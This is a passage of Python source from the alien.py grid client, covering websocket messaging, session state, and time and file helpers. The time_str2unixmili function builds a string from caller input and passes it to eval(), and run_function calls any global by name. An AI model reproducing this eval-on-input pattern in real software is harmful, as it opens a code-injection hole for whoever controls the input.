emptyline_re = re.compile('^\\s*$', re.MULTILINE) # whitespace line
# environment debug variable
_JSON_OUT = bool(os.getenv('ALIENPY_JSON'))
_JSON_OUT_GLOBAL = _JSON_OUT
_DEBUG = os.getenv('ALIENPY_DEBUG', '')
_DEBUG_FILE = os.getenv('ALIENPY_DEBUG_FILE', f'{Path.home().as_posix()}/alien_py.log')
_TIME_CONNECT = os.getenv('ALIENPY_TIMECONNECT', '')
_TMPDIR = os.getenv('TMPDIR', '/tmp')
_DEBUG_TIMING = os.getenv('ALIENPY_TIMING', '') # enable really detailed timings in logs
# global session state;
AlienSessionInfo = {'alienHome': '', 'currentdir': '', 'prevdir': '', 'commandlist': [], 'user': '', 'exitcode': int(-1), 'session_started': False,
'cmd2func_map_nowb': {}, 'cmd2func_map_client': {}, 'cmd2func_map_srv': {}, 'templist': [], 'use_usercert': False, 'alias_cache': {},
'pathq': deque([]), 'show_date': False, 'show_lpwd': False}
if _HAS_READLINE:
def setupHistory():
"""Setup up history mechanics for readline module"""
histfile = os.path.join(os.path.expanduser("~"), ".alienpy_history")
if not os.path.exists(histfile): open(histfile, 'wb').close()
rl.set_history_length(-1) # unlimited history
rl.read_history_file(histfile)
def startup_hook(): rl.append_history_file(1, histfile) # before next prompt save last line
rl.set_startup_hook(startup_hook)
def _is_valid_xrootd() -> bool:
if not _HAS_XROOTD: return False
xrd_ver_arr = xrd_client.__version__.split(".")
if len(xrd_ver_arr) > 1:
_XRDVER_1 = xrd_ver_arr[0][1:] if xrd_ver_arr[0].startswith('v') else xrd_ver_arr[0] # take out the v if present
_XRDVER_2 = xrd_ver_arr[1]
return int(_XRDVER_1) >= 5 and int(_XRDVER_2) > 2
else: # version is not of x.y.z form, this is git based form
xrdver_git = xrd_ver_arr[0].split("-")
_XRDVER_1 = xrdver_git[0][1:] if xrdver_git[0].startswith('v') else xrdver_git[0] # take out the v if present
_XRDVER_2 = xrdver_git[1]
return int(_XRDVER_1) > 20211113
# use only 5.3 versions and up - reference point
_HAS_XROOTD = _is_valid_xrootd()
_HAS_XROOTD_GETDEFAULT = False
if _HAS_XROOTD:
def XRD_EnvPut(key, value):
"""Sets the given key in the xrootd client environment to the given value.
Returns false if there is already a shell-imported setting for this key, true otherwise"""
if str(value).isdigit():
return xrd_client.EnvPutInt(key, int(value))
else:
return xrd_client.EnvPutString(key, value)
# Override the application name reported to the xrootd server.
XRD_EnvPut('XRD_APPNAME', f'alien.py/{ALIENPY_VERSION_STR} xrootd/{xrd_client.__version__}')
_HAS_XROOTD_GETDEFAULT = hasattr(xrd_client, 'EnvGetDefault')
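# Usage sketch (illustrative): XRD_EnvPut('ConnectionRetry', 3) goes through
# EnvPutInt, while XRD_EnvPut('XRD_APPNAME', 'alien.py') falls through to
# EnvPutString; any value whose str() form is all digits is stored as an int.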
class COLORS(NamedTuple): # pylint: disable=inherit-non-class
"""Collection of colors for terminal printing"""
ColorReset = '\033[00m' # Text Reset
Black = '\033[0;30m' # Black
Red = '\033[0;31m' # Red
Green = '\033[0;32m' # Green
Yellow = '\033[0;33m' # Yellow
Blue = '\033[0;34m' # Blue
Purple = '\033[0;35m' # Purple
Cyan = '\033[0;36m' # Cyan
White = '\033[0;37m' # White
BBlack = '\033[1;30m' # Bold Black
BRed = '\033[1;31m' # Bold Red
BGreen = '\033[1;32m' # Bold Green
BYellow = '\033[1;33m' # Bold Yellow
BBlue = '\033[1;34m' # Bold Blue
BPurple = '\033[1;35m' # Bold Purple
BCyan = '\033[1;36m' # Bold Cyan
BWhite = '\033[1;37m' # Bold White
UBlack = '\033[4;30m' # Underline Black
URed = '\033[4;31m' # Underline Red
UGreen = '\033[4;32m' # Underline Green
UYellow = '\033[4;33m' # Underline Yellow
UBlue = '\033[4;34m' # Underline Blue
UPurple = '\033[4;35m' # Underline Purple
UCyan = '\033[4;36m' # Underline Cyan
UWhite = '\033[4;37m' # Underline White
IBlack = '\033[0;90m' # High Intensity Black
IRed = '\033[0;91m' # High Intensity Red
IGreen = '\033[0;92m' # High Intensity Green
IYellow = '\033[0;93m' # High Intensity Yellow
IBlue = '\033[0;94m' # High Intensity Blue
IPurple = '\033[0;95m' # High Intensity Purple
ICyan = '\033[0;96m' # High Intensity Cyan
IWhite = '\033[0;97m' # High Intensity White
BIBlack = '\033[1;90m' # Bold High Intensity Black
BIRed = '\033[1;91m' # Bold High Intensity Red
BIGreen = '\033[1;92m' # Bold High Intensity Green
BIYellow = '\033[1;93m' # Bold High Intensity Yellow
BIBlue = '\033[1;94m' # Bold High Intensity Blue
BIPurple = '\033[1;95m' # Bold High Intensity Purple
BICyan = '\033[1;96m' # Bold High Intensity Cyan
BIWhite = '\033[1;97m' # Bold High Intensity White
On_Black = '\033[40m' # Background Black
On_Red = '\033[41m' # Background Red
On_Green = '\033[42m' # Background Green
On_Yellow = '\033[43m' # Background Yellow
On_Blue = '\033[44m' # Background Blue
On_Purple = '\033[45m' # Background Purple
On_Cyan = '\033[46m' # Background Cyan
On_White = '\033[47m' # Background White
On_IBlack = '\033[0;100m' # High Intensity backgrounds Black
On_IRed = '\033[0;101m' # High Intensity backgrounds Red
On_IGreen = '\033[0;102m' # High Intensity backgrounds Green
On_IYellow = '\033[0;103m' # High Intensity backgrounds Yellow
On_IBlue = '\033[0;104m' # High Intensity backgrounds Blue
On_IPurple = '\033[0;105m' # High Intensity backgrounds Purple
On_ICyan = '\033[0;106m' # High Intensity backgrounds Cyan
On_IWhite = '\033[0;107m' # High Intensity backgrounds White
class XrdCpArgs(NamedTuple): # pylint: disable=inherit-non-class
"""Structure to keep the set of xrootd flags used for xrootd copy process"""
overwrite: bool
batch: int
sources: int
chunks: int
chunksize: int
makedir: bool
tpc: str
posc: bool
hashtype: str
streams: int
cksum: bool
timeout: int
rate: int
class CopyFile(NamedTuple): # pylint: disable=inherit-non-class
"""Structure to keep a generic copy task"""
src: str
dst: str
isUpload: bool
token_request: dict
lfn: str
class CommitInfo(NamedTuple): # pylint: disable=inherit-non-class
"""Structure for commit of succesful xrootd write to file catalogue"""
envelope: str
size: str
lfn: str
perm: str
expire: str
pfn: str
se: str
guid: str
md5: str
class lfn2file(NamedTuple): # pylint: disable=inherit-non-class
"""Map a lfn to file (and reverse)"""
lfn: str
file: str
class KV(NamedTuple): # pylint: disable=inherit-non-class
"""Assign a value to a key"""
key: str
val: str
class RET(NamedTuple): # pylint: disable=inherit-non-class
"""Structure for POSIX like function return: exitcode, stdout, stderr, dictionary of server reply"""
exitcode: int = -1
out: str = ''
err: str = ''
ansdict: dict = {}
def print(self, opts = ''):
if 'json' in opts:
if self.ansdict:
json_out = json.dumps(self.ansdict, sort_keys = True, indent = 4)
print_out(json_out)
if _DEBUG: logging.debug(json_out)
else:
print_err('This command did not return a json dictionary')
return
if self.exitcode != 0:
if 'info' in opts: logging.info(self.err)
if 'warn' in opts: logging.warning(self.err)
if 'err' in opts: logging.error(self.err)
if 'debug' in opts: logging.debug(self.err)
if self.err and not ('noerr' in opts or 'noprint' in opts):
print_err(f'{self.err.strip()}')
else:
if self.out and not ('noout' in opts or 'noprint' in opts):
print_out(f'{self.out.strip()}')
__call__ = print
def __bool__(self):
return self.exitcode == 0
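# Usage sketch (illustrative): ok = RET(0, 'all good'); bool(ok) is True and
# ok.print() writes 'all good' to stdout; ok('json') needs ok.ansdict populated,
# otherwise it reports that no json dictionary was returned.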
class ALIEN_COLLECTION_EL(NamedTuple): # pylint: disable=inherit-non-class
"""AliEn style xml collection element strucure"""
name: str = ''
aclId: str = ''
broken: str = ''
ctime: str = ''
dir: str = ''
entryId: str = ''
expiretime: str = ''
gowner: str = ''
guid: str = ''
guidtime: str = ''
jobid: str = ''
lfn: str = ''
md5: str = ''
owner: str = ''
perm: str = ''
replicated: str = ''
size: str = ''
turl: str = ''
type: str = ''
class Msg:
"""Class to create json messages to be sent to server"""
__slots__ = ('cmd', 'args', 'opts')
def __init__(self, cmd = '', args = None, opts = ''):
self.cmd = cmd
self.opts = opts
if not args:
self.args = []
elif isinstance(args, str):
self.args = shlex.split(args)
elif isinstance(args, list):
self.args = args.copy()
def add_arg(self, arg):
if isinstance(arg, str): self.args.extend(shlex.split(arg))
if isinstance(arg, list): self.args.extend(arg)
def dict(self):
return CreateJsonCommand(self.cmd, self.args, self.opts, True)
def str(self):
return CreateJsonCommand(self.cmd, self.args, self.opts)
def __call__(self):
return (self.cmd, self.args, self.opts)
def __bool__(self):
return bool(self.cmd)
class AliEn:
"""Class to be used as advanced API for interaction with central servers"""
__slots__ = ('internal_wb', 'opts')
def __init__(self, opts = ''):
self.internal_wb = InitConnection()
self.opts = opts
def run(self, cmd, opts = '') -> Union[RET, str]:
"""SendMsg to server a string command, a RET object will be returned"""
if not opts: opts = self.opts
return SendMsg(self.internal_wb, cmd, opts = opts)
def ProcessMsg(self, cmd, opts = '') -> int:
"""ProcessCommandChain - the app main function to process a (chain of) command(s)"""
if not opts: opts = self.opts
return ProcessCommandChain(self.internal_wb, cmd)
def wb(self):
"""Get the websocket, to be used in other functions"""
return self.internal_wb
def help(self): # pylint: disable=no-self-use
"""Print help message"""
print_out('Methods of AliEn session:\n'
'.run(cmd, opts) : alias to SendMsg(cmd, opts); It will return a RET object: named tuple (exitcode, out, err, ansdict)\n'
'.ProcessMsg(cmd_list) : alias to ProcessCommandChain, it will have the same output as in the alien.py interaction\n'
'.wb() : return the session WebSocket to be used with other function within alien.py')
def signal_handler(sig, frame): # pylint: disable=unused-argument
"""Generig signal handler: just print the signal and exit"""
print_out(f'\nCought signal {sig}, let\'s exit')
exit_message(int(AlienSessionInfo['exitcode']))
def exit_message(code: int = 0, msg = ''):
"""Exit with msg and with specied code"""
print_out(msg if msg else 'Exit')
sys.exit(code)
def is_guid(guid: str) -> bool:
"""Recognize a GUID format"""
return bool(guid_regex.fullmatch(guid)) # identify if the argument is an AliEn GUID
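# Example (illustrative): is_guid('6894AEE2-DFC9-11E8-9CF5-0242AC130002') is True,
# is_guid('not-a-guid') is False; matching is case-insensitive and full-string.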
def run_function(function_name: str, *args, **kwargs):
"""Python code:: run some arbitrary function name (found in globals) with arbitrary arguments"""
return globals()[function_name](*args, **kwargs) # run arbitrary function
def print_out(msg: str, toLog: bool = False):
if toLog:
logging.log(90, msg)
else:
print(msg, flush = True)
def print_err(msg: str, toLog: bool = False):
if toLog:
logging.log(95, msg)
else:
print(msg, file=sys.stderr, flush = True)
def isfloat(arg: Union[str, float, None]) -> bool:
if not arg: return False
return str(arg).replace('.', '', 1).isdigit()
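# Note (illustrative): only plain unsigned decimals pass, e.g. isfloat('3.14') is
# True while isfloat('-1.5') and isfloat('1e3') are False (sign/exponent survive
# the single '.' removal and fail isdigit()).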
def time_unix2simple(time_arg: Union[str, int, None]) -> str:
if not time_arg: return ''
return datetime.datetime.fromtimestamp(float(time_arg)).replace(microsecond=0).isoformat().replace('T', ' ')
def time_str2unixmili(time_arg: Union[str, int, None]) -> int:
if not time_arg:
return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
time_arg = str(time_arg)
if (time_arg.isdigit() or isfloat(time_arg)) and len(time_arg) not in (10, 13): return int(-1)
if isfloat(time_arg) and len(time_arg) == 10:
return int(float(time_arg) * 1000)
if time_arg.isdigit() and len(time_arg) == 13:
return int(time_arg)
# assume that these are strptime arguments in the form of: time_str, format_str
try:
time_obj = eval(f"datetime.datetime.strptime({time_arg})")
return int((time_obj - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
except Exception as e:
return int(-1)
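# Examples (illustrative): time_str2unixmili('1609459200') -> 1609459200000
# (10-digit epoch seconds), time_str2unixmili('1609459200123') -> 1609459200123
# (13-digit epoch milliseconds); time_str2unixmili("'2021-12-02', '%Y-%m-%d'") is
# handed to strptime and converted to milliseconds since epoch.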
#########################
# ASYNCIO MECHANICS
#########################
def start_asyncio():
"""Initialization of main thread that will keep the asyncio loop"""
loop = None
ready = threading.Event()
def _cancel_all_tasks(loop):
if sys.version_info[1] < 8:
to_cancel = asyncio.Task.all_tasks(loop) # pylint: disable=no-member # asyncio.tasks
else:
to_cancel = asyncio.all_tasks(loop) # asyncio.tasks
if not to_cancel: return
for task in to_cancel: task.cancel()
loop.run_until_complete(asyncio.tasks.gather(*to_cancel, loop=loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled(): continue
if task.exception() is not None:
loop.call_exception_handler({'message': 'unhandled exception during asyncio.run() shutdown', 'exception': task.exception(), 'task': task, })
def run(mainasync, *, debug=False):
if asyncio.events._get_running_loop() is not None: raise RuntimeError("asyncio.run() cannot be called from a running event loop") # pylint: disable=protected-access
if not asyncio.coroutines.iscoroutine(mainasync): raise ValueError("a coroutine was expected, got {!r}".format(mainasync))
loop = asyncio.events.new_event_loop()
try:
asyncio.events.set_event_loop(loop)
loop.set_debug(debug)
return loop.run_until_complete(mainasync)
finally:
try:
_cancel_all_tasks(loop)
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
asyncio.events.set_event_loop(None)
loop.close()
async def wait_forever():
nonlocal loop
loop = asyncio.get_event_loop()
ready.set()
await loop.create_future()
threading.Thread(daemon=True, target=run, args=(wait_forever(),)).start()
ready.wait()
return loop
# GLOBAL STATE ASYNCIO LOOP !!! REQUIRED TO BE GLOBAL !!!
_alienpy_global_asyncio_loop = start_asyncio()
def syncify(fn):
"""DECORATOR FOR SYNCIFY FUNCTIONS:: the magic for un-async functions"""
def syncfn(*args, **kwds):
# submit the original coroutine to the event loop and wait for the result
conc_future = asyncio.run_coroutine_threadsafe(fn(*args, **kwds), _alienpy_global_asyncio_loop)
return conc_future.result()
syncfn.as_async = fn
return syncfn
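# Usage sketch (illustrative, not part of alien.py):
# @syncify
# async def _answer(value, delay = 0.01):
#     await asyncio.sleep(delay)
#     return value
# _answer(42) blocks the caller while the coroutine runs on
# _alienpy_global_asyncio_loop and then returns 42.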
@syncify
async def IsWbConnected(wb) -> bool:
"""Check if websocket is connected with the protocol ping/pong"""
time_begin = None
if _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
if _DEBUG:
logging.info(f"Called from: {sys._getframe().f_back.f_code.co_name}") # pylint: disable=protected-access
try:
pong_waiter = await wb.ping()
await pong_waiter
except Exception as e:
logging.debug('WB ping/pong failed!!!')
logging.exception(e)
return False
if time_begin: logging.error(f">>>IsWbConnected time = {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms")
return True
@syncify
async def wb_close(wb, code, reason):
"""Send close to websocket"""
await wb.close(code = code, reason = reason)
@syncify
async def msg_proxy(websocket, use_usercert = False):
"""Proxy messages from a connection point to another"""
wb_jalien = AlienConnect(None, use_usercert)
local_query = await websocket.recv()
jalien_answer = await SendMsg(wb_jalien, local_query)
await websocket.send(jalien_answer.ansdict)
@syncify
async def __sendmsg(wb, jsonmsg: str) -> str:
"""The low level async function for send/receive"""
time_begin = None
if _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
await wb.send(jsonmsg)
result = await wb.recv()
if time_begin: logging.debug(f">>>__sendmsg time = {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms")
return result
@syncify
async def __sendmsg_multi(wb, jsonmsg_list: list) -> list:
"""The low level async function for send/receive multiple messages once"""
if not jsonmsg_list: return []
time_begin = None
if _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
for msg in jsonmsg_list: await wb.send(msg)
result_list = []
for i in range(len(jsonmsg_list)):
result = await wb.recv()
result_list.append(result)
if time_begin: logging.debug(f">>>__sendmsg time = {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms")
return result_list
def SendMsg(wb, cmdline: str, args: Union[None, list] = None, opts: str = '') -> Union[RET, str]:
"""Send a json message to the specified websocket; it will return the server answer"""
if not wb:
msg = "SendMsg:: websocket not initialized"
logging.info(msg)
return '' if 'rawstr' in opts else RET(1, '', msg)
if not args: args = []
time_begin = None
if _DEBUG or _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
if _JSON_OUT_GLOBAL or _JSON_OUT or _DEBUG: # if json output was requested, then make sure we get the full answer
opts = opts.replace('nokeys', '').replace('nomsg', '')
if '{"command":' in cmdline and '"options":' in cmdline: # seems as json input
jsonmsg = cmdline
else:
jsonmsg = CreateJsonCommand(cmdline, args, opts) # nomsg/nokeys will be passed to CreateJsonCommand
if not jsonmsg:
logging.info("SendMsg:: json message is empty!")
return '' if 'rawstr' in opts else RET(1, '', f"SendMsg:: empty json with args:: {cmdline} {' '.join(args)} /opts= {opts}")
if _DEBUG:
logging.debug(f"Called from: {sys._getframe().f_back.f_code.co_name}\nSEND COMMAND:: {jsonmsg}") # pylint: disable=protected-access
nr_tries = int(1)
result = None
non_connection_exception = False
connection_exception = False
while result is None:
if non_connection_exception: break
if nr_tries > 3:
connection_exception = True
break
nr_tries += 1
try:
result = __sendmsg(wb, jsonmsg)
except (websockets.ConnectionClosed, websockets.ConnectionClosedError, websockets.ConnectionClosedOK) as e:
if e.__cause__:
logging.exception(f'SendMsg:: failure because of {e.__cause__}')
# non_connection_exception = True
# break
logging.exception(e)
try:
wb = InitConnection()
except Exception as e:
logging.error(f'SendMsg:: Could not recover connection when disconnected!! Check {_DEBUG_FILE}')
logging.exception(e)
except Exception as e:
logging.exception(e)
non_connection_exception = True
if result is None and not non_connection_exception: time.sleep(0.2)
if time_begin: logging.debug(f"SendMsg::Result received: {deltat_ms(time_begin)} ms")
if not result:
if connection_exception:
msg = f"SendMsg:: communication error!\nSent command: {jsonmsg}"
print_err(msg)
logging.error(msg)
if non_connection_exception:
msg = f'SendMsg:: Non-connection related exception!! Check {_DEBUG_FILE}'
print_err(msg)
logging.error(msg)
return RET(1, '', 'SendMsg:: Empty result received from server')
if 'rawstr' in opts: return result
ret_obj = retf_result2ret(result)
if time_begin: logging.debug(f"SendMsg::Result decoded: {deltat_ms(time_begin)} ms")
return ret_obj
def SendMsgMulti(wb, cmds_list: list, opts: str = '') -> list:
"""Send a json message to the specified websocket; it will return the server answer"""
if not wb:
msg = "SendMsg:: websocket not initialized"
logging.info(msg)
return '' if 'rawstr' in opts else RET(1, '', msg)
if not cmds_list: return []
time_begin = None
if _DEBUG or _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
if _JSON_OUT_GLOBAL or _JSON_OUT or _DEBUG: # if json output was requested, then make sure we get the full answer
opts = opts.replace('nokeys', '').replace('nomsg', '')
json_cmd_list = []
for cmd_str in cmds_list:
if '{"command":' in cmd_str and '"options":' in cmd_str: # seems as json input
jsonmsg = cmd_str
else:
jsonmsg = CreateJsonCommand(cmd_str, [], opts) # nomsg/nokeys will be passed to CreateJsonCommand
json_cmd_list.append(jsonmsg)
if _DEBUG:
logging.debug(f"Called from: {sys._getframe().f_back.f_code.co_name}\nSEND COMMAND:: {jsonmsg}") # pylint: disable=protected-access
nr_tries = int(1)
result_list = None
non_connection_exception = False
connection_exception = False
while result_list is None:
if non_connection_exception: break
if nr_tries > 3:
connection_exception = True
break
nr_tries += 1
try:
result_list = __sendmsg_multi(wb, json_cmd_list)
except (websockets.ConnectionClosed, websockets.ConnectionClosedError, websockets.ConnectionClosedOK) as e:
if e.__cause__:
logging.exception(f'SendMsg:: failure because of {e.__cause__}')
# non_connection_exception = True
# break
logging.exception(e)
try:
wb = InitConnection()
except Exception as e:
logging.error(f'SendMsg:: Could not recover connection when disconnected!! Check {_DEBUG_FILE}')
logging.exception(e)
except Exception as e:
logging.exception(e)
non_connection_exception = True
if result_list is None and not non_connection_exception: time.sleep(0.2)
if time_begin: logging.debug(f"SendMsg::Result received: {deltat_ms(time_begin)} ms")
if not result_list: return []
if 'rawstr' in opts: return result_list
ret_obj_list = [retf_result2ret(result) for result in result_list]
if time_begin: logging.debug(f"SendMsg::Result decoded: {deltat_ms(time_begin)} ms")
return ret_obj_list
def retf_result2ret(result: Union[str, dict, None], internal_cmd = False) -> RET:
"""Convert AliEn answer dictionary to RET object"""
global AlienSessionInfo
if not result: return RET()
out_dict = None
if isinstance(result, str):
try:
out_dict = json.loads(result)
except Exception as e:
msg = 'retf_result2ret:: Could not load argument as json!\n{0}'.format(e)
logging.error(msg)
return RET(1, '', msg)
else:
out_dict = result.copy()
if 'metadata' not in out_dict or 'results' not in out_dict: # this works only for AliEn responses
msg = 'retf_result2ret:: Dictionary does not have AliEn answer format'
logging.error(msg)
return RET(1, '', msg)
message_list = [str(item['message']) for item in out_dict['results'] if 'message' in item]
output = '\n'.join(message_list)
ret_obj = RET(int(out_dict["metadata"]["exitcode"]), output.strip(), out_dict["metadata"]["error"], out_dict)
if AlienSessionInfo: # update global state of session
AlienSessionInfo['exitcode'] = out_dict["metadata"]["exitcode"] # keep last exit code
AlienSessionInfo['user'] = out_dict["metadata"]["user"] # always update the current user
current_dir = out_dict["metadata"]["currentdir"]
# if this is first connection, current dir is alien home
if not AlienSessionInfo['alienHome']: AlienSessionInfo['alienHome'] = current_dir
# update the current/previous dir status
prev_dir = AlienSessionInfo['currentdir'] # last known current dir
if prev_dir != current_dir:
AlienSessionInfo['currentdir'] = current_dir
AlienSessionInfo['prevdir'] = prev_dir
# update directory stack (pushd/popd/dirs)
short_current_dir = current_dir.replace(AlienSessionInfo['alienHome'][:-1], '~')
short_current_dir = short_current_dir[:-1] # remove the last /
if AlienSessionInfo['pathq']:
if AlienSessionInfo['pathq'][0] != short_current_dir: AlienSessionInfo['pathq'][0] = short_current_dir
else:
push2stack(short_current_dir)
return ret_obj
def PrintDict(in_arg: Union[str, dict, list]):
"""Print a dictionary in a nice format"""
if isinstance(in_arg, str):
try:
in_arg = json.loads(in_arg)
except Exception as e:
print_err('PrintDict:: Could not load argument as json!\n{0}'.format(e))
print_out(json.dumps(in_arg, sort_keys = True, indent = 4))
def CreateJsonCommand(cmdline: Union[str, dict], args: Union[None, list] = None, opts: str = '', get_dict: bool = False) -> Union[str, dict]:
"""Return a json with command and argument list"""
if args is None: args = []
if isinstance(cmdline, dict):
out_dict = cmdline.copy()
if 'showmsg' in opts: opts = opts.replace('nomsg', '')
if 'showkeys' in opts: opts = opts.replace('nokeys', '')
if 'nomsg' in opts: out_dict["options"].insert(0, '-nomsg')
if 'nokeys' in opts: out_dict["options"].insert(0, '-nokeys')
return out_dict if get_dict else json.dumps(out_dict)
if not args:
args = shlex.split(cmdline)
cmd = args.pop(0) if args else ''
else:
cmd = cmdline
if 'nomsg' in opts: args.insert(0, '-nomsg')
if 'nokeys' in opts: args.insert(0, '-nokeys')
jsoncmd = {"command": cmd, "options": args}
return jsoncmd if get_dict else json.dumps(jsoncmd)
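# Example (illustrative): CreateJsonCommand('ls -la /alice', opts = 'nomsg')
# returns '{"command": "ls", "options": ["-nomsg", "-la", "/alice"]}'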
def GetMeta(result: dict, meta: str = '') -> list:
"""Extract from input and return a list of 2nd arg selectable of cwd user error exitcode"""
output = []
if not result: return output
if isinstance(result, dict) and 'metadata' in result: # this works only for AliEn responses
meta_opts_list = meta.split() if meta else []
if 'cwd' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["currentdir"])
if 'user' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["user"])
if 'error' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["error"])
if 'exitcode' in meta_opts_list or 'all' in meta_opts_list: output.append(result["metadata"]["exitcode"])
return output
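# Example (illustrative): GetMeta(ans, 'user exitcode') returns
# [ans['metadata']['user'], ans['metadata']['exitcode']]; the output order is
# always cwd, user, error, exitcode, independent of the order in the 2nd argument.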
def PrintColor(color: str) -> str:
"""Disable color if the terminal does not have capability"""
return color if _HAS_COLOR else ''
def cursor_vertical(lines: int = 0):
"""Move the cursor up/down N lines"""
if lines == 0: return
out_char = '\x1b[1A' # UP
if lines < 0:
out_char = '\x1b[1B' # DOWN
lines = abs(lines)
sys.stdout.write(out_char * lines)
sys.stdout.flush()
def cursor_horizontal(lines: int = 0):
"""Move the cursor left/right N lines"""
if lines == 0: return
out_char = '\x1b[1C' # RIGHT
if lines < 0:
out_char = '\x1b[1D' # LEFT
lines = abs(lines)
sys.stdout.write(out_char * lines)
sys.stdout.flush()
def cleanup_temp():
"""Remove from disk all recorded temporary files"""
if AlienSessionInfo['templist']:
for f in AlienSessionInfo['templist']:
if os.path.isfile(f): os.remove(f)
def now_str() -> str: return str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def deltat_ms(t0: Union[str, float, None] = None) -> str:
"Return delta t in ms from a time start; if no argment it return a timestamp in ms"
if not t0:
return f"{datetime.datetime.now().timestamp() * 1000:.3f}"
else:
t0 = float(t0)
return f"{(datetime.datetime.now().timestamp() - t0) * 1000:.3f}"
def deltat_us(t0: Union[str, float, None] = None) -> str:
"Return delta t in ms from a time start; if no argment it return a timestamp in ms"
if not t0:
return f"{datetime.datetime.now().timestamp() * 1000000:.3f}"
else:
t0 = float(t0)
return f"{(datetime.datetime.now().timestamp() - t0) * 1000000:.3f}"
def is_help(args: Union[str, list]) -> bool:
if not args: return False
if isinstance(args, str): args = args.split()
help_opts = ('-h', '--h', '-help', '--help')
return any(opt in args for opt in help_opts)
def retf_print(ret_obj: RET, opts: str = '') -> int:
"""Process a RET object; it will return the exitcode
opts content will steer the logging and message printing:
- noprint : silence all stdout/stderr printing
- noerr/noout : silence the respective messages
- info/warn/err/debug : will log the stderr to that facility
- json : will print just the json (if present)
"""
if 'json' in opts:
if ret_obj.ansdict:
json_out = json.dumps(ret_obj.ansdict, sort_keys = True, indent = 3)
if _DEBUG: logging.debug(json_out)
print_out(json_out)
else:
print_err('This command did not return a json dictionary')
return ret_obj.exitcode
if ret_obj.exitcode != 0:
if 'info' in opts: logging.info(ret_obj.err)
if 'warn' in opts: logging.warning(ret_obj.err)
if 'err' in opts: logging.error(ret_obj.err)
if 'debug' in opts: logging.debug(ret_obj.err)
if ret_obj.err and not ('noerr' in opts or 'noprint' in opts):
print_err(f'{ret_obj.err.strip()}')
else:
if ret_obj.out and not ('noout' in opts or 'noprint' in opts):
print_out(f'{ret_obj.out.strip()}')
return ret_obj.exitcode
def read_conf_file(file: str) -> dict:
"""Convert a configuration file with key = value format to a dict"""
DICT_INFO = {}
try:
with open(file) as rel_file:
for line in rel_file:
line = line.partition('#')[0].rstrip()
name, var = line.partition("=")[::2]
var = re.sub(r"^\"", '', str(var.strip()))
var = re.sub(r"\"$", '', var)
DICT_INFO[name.strip()] = var
except Exception:
pass
return DICT_INFO
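# Example (illustrative): the line >CWD = "/alice/cern.ch/user/a/auser/" # remark<
# yields {'CWD': '/alice/cern.ch/user/a/auser/'}; the '#' tail is dropped and
# surrounding double quotes are stripped.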
def file2list(file: str) -> list:
"""Parse a file and return a list of elements"""
if not file or not os.path.isfile(file): return []
file_list = []
with open(file) as filecontent:
for line in filecontent:
if not line or ignore_comments_re.search(line) or emptyline_re.match(line): continue
file_list.extend(line.strip().split())
return file_list
def fileline2list(file: str) -> list:
"""Parse a file and return a list of file lines"""
if not file or not os.path.isfile(file): return []
file_list = []
with open(file) as filecontent:
for line in filecontent:
if not line or ignore_comments_re.search(line) or emptyline_re.match(line): continue
file_list.extend([line.strip()])
return file_list
def import_aliases():
global AlienSessionInfo
alias_file = os.path.join(os.path.expanduser("~"), ".alienpy_aliases")
if os.path.exists(alias_file): AlienSessionInfo['alias_cache'] = read_conf_file(alias_file)
def os_release() -> dict:
return read_conf_file('/etc/os-release')
def get_lfn_key(lfn_obj: dict) -> str:
"""get either lfn key or file key from a file description"""
if not lfn_obj or not isinstance(lfn_obj, dict): return ''
if "lfn" in lfn_obj: return lfn_obj["lfn"]
if "file" in lfn_obj: return lfn_obj["file"]
return ''
def pid_uid(pid: int) -> int:
'''Return the UID of the process pid'''
uid = int(-1)
try:
with open(f'/proc/{pid}/status') as proc_status:
for line in proc_status:
# Uid, Gid: Real, effective, saved set, and filesystem UIDs(GIDs)
if line.startswith('Uid:'): uid = int((line.split()[1]))
except Exception:
pass
return uid
def is_my_pid(pid: int) -> bool: return bool(pid_uid(int(pid)) == os.getuid())
def writePidFile(filename: str):
try:
with open(filename, 'w') as f: f.write(str(os.getpid()))
except Exception as e:
logging.error('{0}'.format(e))
def GetSessionFilename() -> str: return os.path.join(os.path.expanduser("~"), ".alienpy_session")
def SessionSave():
try:
with open(GetSessionFilename(), "w") as f:
line1 = f"CWD = {AlienSessionInfo['currentdir']}\n"
if not AlienSessionInfo['prevdir']: AlienSessionInfo['prevdir'] = AlienSessionInfo['currentdir']
line2 = f"CWDPREV = {AlienSessionInfo['prevdir']}\n"
f.writelines([line1, line2])
except Exception as e:
logging.warning("SessionSave:: failed to write file")
logging.exception(e)
def SessionRestore(wb):
if os.getenv('ALIENPY_NO_CWD_RESTORE'): return
global AlienSessionInfo
session = read_conf_file(GetSessionFilename())
if not session: return
sys_cur_dir = AlienSessionInfo['currentdir']
if 'CWD' in session: AlienSessionInfo['currentdir'] = session['CWD']
if 'CWDPREV' in session: AlienSessionInfo['prevdir'] = session['CWDPREV']
if AlienSessionInfo['currentdir'] and (sys_cur_dir != AlienSessionInfo['currentdir']):
cd(wb, AlienSessionInfo['currentdir'], opts = 'nocheck')
def exitcode(args: Union[list, None] = None): # pylint: disable=unused-argument
"""Return the latest global recorded exitcode"""
return RET(0, f"{AlienSessionInfo['exitcode']}", '')
def unixtime2local(timestamp: Union[str, int], decimals: bool = True) -> str:
"""Convert unix time to a nice custom format"""
timestr = str(timestamp)
if len(timestr) < 10: return ''
micros = None
millis = None
if len(timestr) > 10:
time_decimals = timestr[10:]
if len(time_decimals) <= 3:
time_decimals = time_decimals.ljust(3, '0')
millis = datetime.timedelta(milliseconds=int(time_decimals))
else:
time_decimals = time_decimals.ljust(6, '0')
micros = datetime.timedelta(microseconds=int(time_decimals))
unixtime = timestr[:10]
